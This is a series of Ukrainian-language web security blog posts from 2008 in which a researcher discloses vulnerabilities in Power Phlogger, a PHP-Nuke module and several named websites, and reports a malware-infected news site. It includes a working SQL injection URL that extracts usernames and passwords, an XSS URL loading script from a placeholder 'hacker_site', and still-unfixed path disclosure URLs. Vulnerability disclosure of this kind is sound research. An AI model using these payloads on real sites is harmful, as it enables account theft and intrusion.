Websecurity - Веб безпека

До раніше мною оприлюднених уразливостей в Power Phlogger, повідомляю про нові уразливості в даній системі для ведення статистики відвідувань. Деякий час тому, 16.02.2008 та 31.05.2008, я виявив SQL Injection, Information Leakage та Full path disclosure уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.

SQL Injection:

http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit

Information Leakage:

http://site/robots.txt

В robots.txt вказані важливі папки системи, що дозволяє знайти її ресурси та виявити інші Information Disclosure уразливості.

Full path disclosure:

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/modules/usercreate.php

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це п’ята частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

В даній добірці уразливості в веб додатках:

• Local File Include Vulnerabilities in YaBB <= 2.1(all version) (деталі)
• iG Shop 1.4 eval Inclusion Vulnerability (деталі)
• fusetalk SQL (autherror.cfm) (деталі)
• Fusetalk SQL injection submission. (деталі)
• rm@calima.serapis.net (деталі)
• fuzzylime (forum) XSS (деталі)
• Webif.cgi local file inclusion (деталі)
• PHP hosting Biller (деталі)
• Utopia News Pro version 1.4.0 XSS Attack Vulnerability (деталі)
• PHP-інклюдинг в MyPHPCommander (деталі)

21.09.2007

Позавчора, 19.09.2007, я знайшов Cross-Site Scripting уразливість на http://search.yahoo.com - в пошуковій системі Yahoo. Про що найближчим часом сповіщу адміністрацію системи.

Раніше я вже писав під час MOSEB про уразливість в Image Search of Yahoo! Search.

Детальна інформація про уразливість з’явиться пізніше.

30.05.2008

XSS:

• alert(document.cookie) (IE)

Дану уразливість, що працює при UTF-8 кодуванні сторінки (яке задане в Yahoo), вони вже виправили. Але дана уразливість також працює з Japanese (SHIFT_JIS) та Japanese (Auto-Select) кодуванням в Internet Explorer (але тільки, коли їх задати власноруч в браузері).

XSS:

• alert(document.cookie) (IE)
• цікавий (IE)

Дана уразливість так досі не виправлена (хоча про другу уразливість, при двох інших кодуваннях, я Yahoo повідомляв).

Вчора, 28.05.2008, я знайшов Cross-Site Scripting уразливість в модулі AutoHTML для PHP-Nuke. Про Local File Inclusion, Directory Traversal та Information Leakage уразливості в даному модулі для PHP-Nuke я писав раніше.

XSS:

http://site/autohtml.php?filename=%3Cscript%20src=http://hacker_site/xss.js%20

В даному випадку відбувається обхід анти-XSS фільтрів PHP-Nuke.

Уразлива версія PHP-Nuke AutoHTML Module 2.0 (та потенційно інші версії).

В даній добірці уразливості в веб додатках:

• Comdev eCommerce 4.1 RFI Vulnerability (деталі)
• Comdev Web Blogger 4.1 RFI Vulnerability (деталі)
• Full Path Disclosure eqDKP 1.3.2c and prior (деталі)
• Letterman subscriber module XSS vulnerability (деталі)
• RFI In Script SH-News 3.1 (деталі)
• ByPass In PortalApp (деталі)
• MIME-tools 5.411 (Entity 5.404) (деталі)
• Elxis CMS <= 2006.4 - banner module - sql injection (деталі)
• Уразливості smf 1.1.2 (деталі)
• SQL injection vulnerability in LushiNews (деталі)

01.02.2008

У липні, 07.07.2007, я знайшов Full path disclosure, Information Leakage та Cross-Site Scripting уразливості на проекті http://www.visualcomplexity.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

28.05.2008

Full path disclosure:

http://www.visualcomplexity.com/vc/project_details.cfm?id=481&index=481'&domain=
http://www.visualcomplexity.com/vc/project_details.cfm?id=481'&index=481&domain=

Information Leakage:

http://www.visualcomplexity.com/vc/project_details.cfm?id=481&index=481'&domain=
http://www.visualcomplexity.com/vc/project_details.cfm?id=481'&index=481&domain=

XSS:

• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені.

Ще у лютому, 07.02.2007, я знайшов численні Cross-Site Scripting уразливості на http://www.saferinternet.org - сайті Insafe - European Safer Internet Network. Дана організація є головним координатором Дня безпечного Інтернету.

Знайдені XSS є UXSS уразливостями, котрих всього на сайті за даними Гугла є 57 - тобто на сайті є 57 pdf файлів не захищених від XSS в PDF.

XSS:

UXSS через brochure-spam1.pdf

• alert(document.cookie)
• alert(’XSS’)
• цікавий

Темою зараженості веб сайтів я цікавлюся вже деякий час і в цьому році я почав активно проводити дослідження цього питання. Зокрема, в своїй статті про стан зараженості Уанета, я приводив дані про стан зараженості Уанета в попередні роки та зпрогнозував стан на 2008 рік (і я прогнозував подальше збільшення зараженості Уанета).

І зараз я приведу один з прикладів, що підтверджує мої прогнози. В січні я вже писав про небезпечний сайт Партії регіонів.

Нещодавно, 25.05.2008, шукаючи в Гуглі деяку інформацію, я виявив, що сайт dn.kiev.ua інфікований. Тому що Google заявив, що “Ця сторінка може заподіяти шкоду вашому комп’ютерові”. Гугл може й помилятися з такими ярликами, але частіше все ж таки вони вірно відмічають інфіковані сайти.

Після того, як я сам перевірив сайт онлайн ЗМІ “Деловая неделя” http://dn.kiev.ua, я впевнився, що він інфікований. На даному сайті розміщений шкідливий script, причому в зашифрованому вигляді, що створює iframe на скрипт на зовнішньому сайті (що в свою чергу редиректить на інший шкідливий сайт).

Адмінам dn.kiev.ua варто витерти шкідливий код зі свого сайта і почати серйозно слідкувати за безпекою власного сайта. Бо уразливостей на ньому вистачає (як я глянув лише на одній головній сторінці), про що красномовно засвідчив цей випадок з розміщенням на сайті шкідливого коду.

В даній добірці уразливості в веб додатках:

• My Datebook SQL Injection + XSS (деталі)
• Portcullis Security Advisory 06-035 (деталі)
• Portcullis Security Advisory 06-034 (деталі)
• Portcullis Security Advisory - 06-033 (деталі)
• Portcullis Security Advisory 06-038 (деталі)
• CERN Image Map Dispatcher (деталі)
• Dansie Cart Script Exploit Reported (деталі)
• WebStudio Multiple XSS Vulnerabilities (деталі)
• CACTUSHOP 6 Default Installation Allows Remote Database Disclosure (деталі)
• PHP-інклюдинг в xt-stats (деталі)

05.02.2008

У липні, 07.07.2007, я знайшов Cross-Site Scripting уразливість на популярному проекті http://businessweek.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.05.2008

XSS:

• alert(document.cookie) (IE)
• цікавий (IE)

Дана уразливість досі не виправлена.